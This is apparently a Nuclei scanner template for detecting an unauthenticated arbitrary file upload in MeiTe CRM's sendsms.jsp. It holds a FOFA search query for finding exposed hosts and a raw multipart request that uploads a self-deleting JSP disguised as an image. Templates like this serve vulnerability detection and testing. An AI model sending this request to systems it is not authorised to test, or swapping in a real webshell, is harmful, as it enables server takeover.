http:
    - matchers:
        - dsl:
            - status_code==200 && contains_all(body,"value","正在发送,请等候","{{username}}.jsp")
          name: 任意文件上传
          type: dsl
      raw:
        - |
          POST /business/common/sms/sendsms.jsp HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
          Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypZBE5JAfBHwD8TNo
          Accept-Encoding: gzip, deflate

          ------WebKitFormBoundarypZBE5JAfBHwD8TNo
          Content-Disposition: form-data; name="file"; filename="{{username}}.jsp"
          Content-Type: image/jpeg

          <% out.println("pboyjnnrfipmplsukdeczudsefxmywe"); new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
          ------WebKitFormBoundarypZBE5JAfBHwD8TNo--
id: MeiTe-CRM-sendsms-File-upload
info:
    author: HuanXiong
    description: |-
        fofa: body="/common/scripts/basic.js"
        美特 CRM sendsms 接口存在文件上传漏洞，未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
    name: 美特 CRM sendsms 任意文件上传
    reference:
        - null
    severity: critical
    tags:
        - File Upload
        - Servlet
variables:
    username: '{{to_lower(rand_base(6))}}'
